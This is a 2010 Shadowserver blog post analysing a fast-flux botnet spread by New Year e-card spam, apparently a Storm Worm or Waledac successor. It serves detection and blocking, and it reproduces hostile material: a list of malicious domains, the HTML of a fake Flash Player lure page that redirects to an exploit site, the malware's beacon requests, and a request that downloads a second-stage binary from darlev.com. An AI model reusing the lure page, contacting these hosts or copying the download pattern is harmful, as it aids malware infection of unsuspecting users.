« September 2010 · March 2011 · September 2014 »

November 2010
MonTueWedThuFriSatSun
01020304050607
08091011121314
15161718192021
22232425262728
2930     
December 2010
MonTueWedThuFriSatSun
  0102030405
06070809101112
13141516171819
20212223242526
2728293031  
January 2011
MonTueWedThuFriSatSun
     0102
03040506070809
10111213141516
17181920212223
24252627282930
31      

Calendar:

Newest first Oldest first

Thursday, 30 December 2010

New Fast Flux Botnet for the Holidays: Could it be Storm Worm 3.0/Waledac 2.0?

Those of us here at Shadowserver hope you're having a wonderful holiday season and are ready to bring in the new year. We were trying to relax and enjoy relatively quiet times until we noticed a new spam campaign that recently started. At first it looked like your regular old holiday e-card scams that have been around for years. However, upon closer inspection it looks like we could be dealing with the next generation of Storm Worm or Waledac. If you consider Waledac to be Storm Worm 2.0, this looks like it could be version 3.0 or at least Waledac 2.0. There are no real version numbers of course, but we don't have anything else to call it yet. What's it involve you ask? Well here's the list of what we've seen so far:

* Large scale Spam campaigns sending out e-mails with links
* New malicious domains that are fast flux! (TTL of 0 and name servers that frequently update IPs)
* Links are to several hacked websites hosting HTML pages that refresh to new malicious domains
* Links are also directly to new malicious domains
* Malicious domains hosting links to fake flash player and refreshes to exploit pages
* Malware installs that begin beaching to several hosts over HTTP (what we dubbed HTTP2p with Waledac)
* Malware that's been updated to look a bit more like legitimate than past variants
* A very buggy network that is not often available (upstream devices not available)
* Changing/Updated binaries

Spam Campaign

Let's start with the Spam Campaign. We've seen a multitude of subject lines and bodies. Below you'll find a list of subjects we've seen and an example e-mail message. These are coming from all over the Internet with spoofed sender addresses.

	Greeting for you!
	Greeting you with heartiest New Year wishes
	Greetings to You
	Happy New Year greetings e-card is waiting for you
	Happy New Year greetings for you
	Happy New Year greetings from your friend
	Have a happy and colorful New Year!
	l want to share Greeting with you (Shadowserver note: the first letter is an L)
	New Year 2011 greetings for you
	You have a greeting card
	You have a New Year Greeting!
	You have received a greetings card
	You've got a Happy New Year Greeting Card!

The body has been pretty consistent and looks like this:

Charley has created a New Year ecard. To view this page please click here: <URL> The greeting card will be stored for you for 14 days.

There is no pretty HTML or images in the e-mail. Just simple plaintext to a URL either to a legitimate hacked website or to one of the malicious domains.

Screen shot of e-mail to hacked website (Honda Puerto Rico in this case):

Screen shot of e-mail to new malicious domain:

Malicious Websites & Domains

If you visit one of the HTML files hosted on a compromised website, its source will look something like this:

	<meta http-equiv='refresh' content='0;url=hxxp://leolati.com' />

This will redirect you to one of the new malicious domains being used by the botnet. These are fast flux domains that will frequently return a new IP address each time they are resolved.

$ dig leolati.com A +noall +answer
leolati.com. 0 IN A 201.214.172.20

As you can see the A record has a TTL of 0, which essentially instructs name servers not to cache the result. Continually resolving the hostname will return several new IP addresses, just like previously seen with Storm Worm and Waledac. The example below shows what happens if you resolve the domain 4 times in 2 seconds:

$ dig leolati.com +short
24.210.159.3
$ dig leolati.com +short
84.52.32.219
$ dig leolati.com +short
109.87.127.13
$ dig leolati.com +short
91.122.36.192

We have been investigating these new domains from e-mail messages, passive DNS, and other sources and have found the following domains so far to be part of this new botnet:

bethira.com
bitagede.com
cifici.com
darlev.com
elberer.com
envoyee.com
leolati.com
makonicu.com
nurealla.com
scypap.com
suedev.com
teddamp.com

We also found what appears to be a different but closely linked domain that should likely be blocked or monitored for as well:

eplarine.com

Malware & Exploits

The whole point of this botnet is to install malware onto systems of unsuspected visitors. It appears to do this in two ways. The first is through social engineering, by tricking the visitor into installing what is fake flash player. The screen shot below shows what is presented when visitors follow a link sent out in the Spam campaign.

The link goes right to install_flash_player.exe. The visitor has 5 seconds to click this link before the page refreshes to an exploit site in the page source. The source of the website looks like this:

	<html>
	<head>
	<title>Oops, this page requires Flash.</title>
	<meta http-equiv="Refresh" content="5; url=hxxp://staticweb.co.cc/user/index.php?bid=165&rnd=enabled&offset=1&search=temp123&pool=on">
	</head>
	<body bgcolor="white" text="black">
	<br>
	<center>Can't view this greeting? <a href="install_flash_player.exe" target="_blank">Download Flash Player!</a></center>
	</body>
	</html>

If the user downloads and install "install_flash_player.exe", the system will immediately begin connecting to different IP addresses over port 80. The malware will make GET requests like the one seen below.

	GET /fOnoxXpVU2wPFUMq.htm HTTP/1.1
	Host: 77.122.1.250
	Content-Length: 306
	User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)

The requests do have Content-Length fields and include encoded data after the bogus Internet Explorer 8.0 User-Agent. As you may have noticed, this is a GET request with data contained where one would normally find payload for a POST request.

We have observed several different domains used for this URL, all of which have been under the free to register under .co.cc domain. Each of these domains also appears to be hosted on a single Ukranian IP address at 91.204.48.50. We would recommend blocking access to this IP address. These sites appear to fire a few different exploits at the user and will make a GET request to /get/exe.php?x=<exploit tag>, where <exploit tag> is which exploit was successful. The server will respond with the executable and it will write itself as knockout.exe in the user's Temp directory.

After that it does all kinds of beaconing and connection to other unrelated malware websites. Of specific note and interest are two other things it does.

The knockout.exe malware uses the User-Agent Opera/9.80 Pesto/2.2.15 on multiple occasions. One of the first things it does is make the following request to adobe.com:

	POST /geo/productid.php HTTP/1.1
	Host: adobe.com
	User-Agent: Opera/9.80 Pesto/2.2.15
	Content-Type: application/x-www-form-urlencoded
	Content-Length: 20

	id=_6_244_1009707083

The next thing it does is attempt to install the new Storm Worm 3.0 trojan onto the system by making the following request to darlev.com:

	GET /flash2.exe HTTP/1.0
	Host: darlev.com

The last successful grab of install_flash_player.exe that we got had the following details:

	Filename: install_flash_player.exe
	File size: 485888 bytes
	MD5 hash: 58e718e9b9c76330154d4f693b50d50e
	SHA-1 hash: 50add894f5ccc6bbbf0a00b01952605e1256f990
	SHA-256 hash: a7f431309ef5fbe37516153ffd35f1b3475af91f57d9543b724ca53139cd8cae
	ssdeep: 12288:FLc4mNmApKRkvpAbFl6GAC9f8Qrv4uNNbloFg+9l:FzNkvE/8C9UQrv4uTblRql

Detection

Detecting this activity is not too difficult. The first thing you can start with is the domain names above and the malicious IP we listed related to the exploit website. We tested a Snort signature that we found to be fairly reliable at detecting the new beaconing activity. The static User-Agent string, Content-Length field with a GET request, and the beginning of the payload make for fairly easy detection with the below signature.

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Waledac 2.0/Storm Worm 3.0 GET request detected"; flow:established; content:"GET /"; depth:5; content:"|0d0a|Content-Length: "; within:75; content:"|0d0a|User-Agent: Mozilla/4.0 (compatible|3b| MSIE 8.0|3b| Windows NT 6.1|3b| Trident/4.0)|0d0a|"; content:"|0102010101010201|"; within:10; sid:20102011;)

Stability Issues

The new Storm Worm 3.0 network has proven to be pretty unstable. The botnet has been repeatedly returning 503 Service Unavailable for most requests throughout the day. This includes both bot beaconing and requests for the fake greeting card website. We've only been able to successfully download the malware from the network a few times today. We have also observed entire network being intermittently be offline to include fast flux DNS resolution.

Conclusion

We have not done any analysis to see if there are actually any pieces of the code that were directly taken or updated from the Storm Worm or Waledac code. However, whether or not the code is the same or not, this appears to be the next generation of Storm Worm and Waledac. We are just saying it could be Storm Worm 3.0, at least until someone gives it a better name.

Also, it's also worth noting that almost 2 years ago to the day, we posted a blog about the real emergence of Waledac. If you take a look at the screen shot of the e-mail that was sent out in that post, you will see it's very similar to the ones posted above. Additionally, the URL format down to the "?cardid=" is the same as well. If this isn't Storm Worm 3.0 it at least looks very close to Waledac 2.0.

=>Posted December 30, 2010, at 11:28 GMT by Steven Adair